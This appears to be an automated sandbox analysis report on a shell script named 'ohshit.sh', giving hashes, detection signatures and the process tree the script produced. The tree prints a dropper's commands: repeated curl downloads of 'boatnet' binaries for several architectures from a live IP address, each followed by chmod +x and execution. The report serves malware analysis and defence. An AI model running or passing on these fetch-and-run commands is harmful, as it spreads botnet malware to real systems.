Analysis

  • max time kernel
    60s
  • max time network
    63s
  • platform
    debian-12_armhf
  • resource
    debian12-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian12-armhf-20240418-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem
  • submitted
    31-08-2024 21:05

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    fefdf2b7ece4d55bd47778b420f84011

  • SHA1

    2823096e0538910f9b57ff9bae007ec655520fc3

  • SHA256

    3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

  • SHA512

    b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 6 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 7 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:700
    • /usr/bin/curl
      curl -O http://94.156.71.225/hiddenbin/boatnet.x86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:706
    • /usr/bin/cat
      cat boatnet.x86
      2⤵
        PID:755
      • /usr/bin/chmod
        chmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF
        2⤵
          PID:756
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:757
        • /usr/bin/curl
          curl -O http://94.156.71.225/hiddenbin/boatnet.mips
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:761
        • /usr/bin/cat
          cat boatnet.mips
          2⤵
            PID:769
          • /usr/bin/chmod
            chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
            2⤵
              PID:770
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              PID:771
            • /usr/bin/curl
              curl -O http://94.156.71.225/hiddenbin/boatnet.arc
              2⤵
              • Checks CPU configuration
              • Writes file to tmp directory
              PID:774
            • /usr/bin/cat
              cat boatnet.arc
              2⤵
                PID:775
              • /usr/bin/chmod
                chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
                2⤵
                  PID:776
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  PID:777
                • /usr/bin/curl
                  curl -O http://94.156.71.225/hiddenbin/boatnet.i468
                  2⤵
                  • Checks CPU configuration
                  • Writes file to tmp directory
                  PID:780
                • /usr/bin/cat
                  cat boatnet.i468
                  2⤵
                    PID:781
                  • /usr/bin/chmod
                    chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
                    2⤵
                      PID:782
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      PID:783
                    • /usr/bin/curl
                      curl -O http://94.156.71.225/hiddenbin/boatnet.i686
                      2⤵
                      • Checks CPU configuration
                      • Writes file to tmp directory
                      PID:785
                    • /usr/bin/cat
                      cat boatnet.i686
                      2⤵
                        PID:786
                      • /usr/bin/chmod
                        chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
                        2⤵
                          PID:787
                        • /tmp/WTF
                          ./WTF
                          2⤵
                          • Executes dropped EXE
                          PID:788
                        • /usr/bin/curl
                          curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64
                          2⤵
                          • Checks CPU configuration
                          • Writes file to tmp directory
                          PID:790
                        • /usr/bin/cat
                          cat boatnet.x86_64
                          2⤵
                            PID:791
                          • /usr/bin/chmod
                            chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
                            2⤵
                              PID:792
                            • /tmp/WTF
                              ./WTF
                              2⤵
                              • Executes dropped EXE
                              PID:793
                            • /usr/bin/curl
                              curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl
                              2⤵
                              • Checks CPU configuration
                              • Writes file to tmp directory
                              PID:796

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /tmp/boatnet.x86

                            Filesize

                            36KB

                            MD5

                            ba2cb5b8715ba94c39e24e75a34d0ea0

                            SHA1

                            7182bf3b0e14e5224e741c15174c6e93f00df444

                            SHA256

                            01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33

                            SHA512

                            0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d